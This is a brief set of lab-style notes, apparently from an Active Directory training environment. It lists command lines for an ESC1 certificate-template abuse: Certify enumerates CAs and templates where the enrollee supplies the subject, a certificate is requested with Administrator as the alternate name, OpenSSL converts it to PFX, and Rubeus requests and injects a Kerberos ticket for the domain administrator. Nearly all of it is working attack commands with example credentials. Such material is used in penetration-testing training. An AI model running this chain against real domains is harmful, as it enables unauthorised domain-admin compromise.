Checking if the forest is using CAs

Certify.exe find cas

Now finding certs where Enrollee can supply the subject (ESC 1)

Certify.exe find /enrolleesuppliessubject

Logging In as pawadmin

Rubeus.exe asktgt /user:pawadmin /domain:us.techcorp.local /certificate:pawadmin.pfx /password:SecretPass@123 /nowrap /ptt

Now Abusing The CA

C:\\AD\\Tools\\Certify.exe request /ca:Techcorp-DC.techcorp.local\\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

The certificate is saved as cert.pem file

Now changing PEM file to PFX file

C:\\AD\\Tools\\openssl\\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx

Now let’s asktgt using the Certificate

.\\Rubeus.exe asktgt /user:Administrator /domain:us.techcorp.local /certificate:DA.pfx /password:SecretPass@123 /nowrap /ptt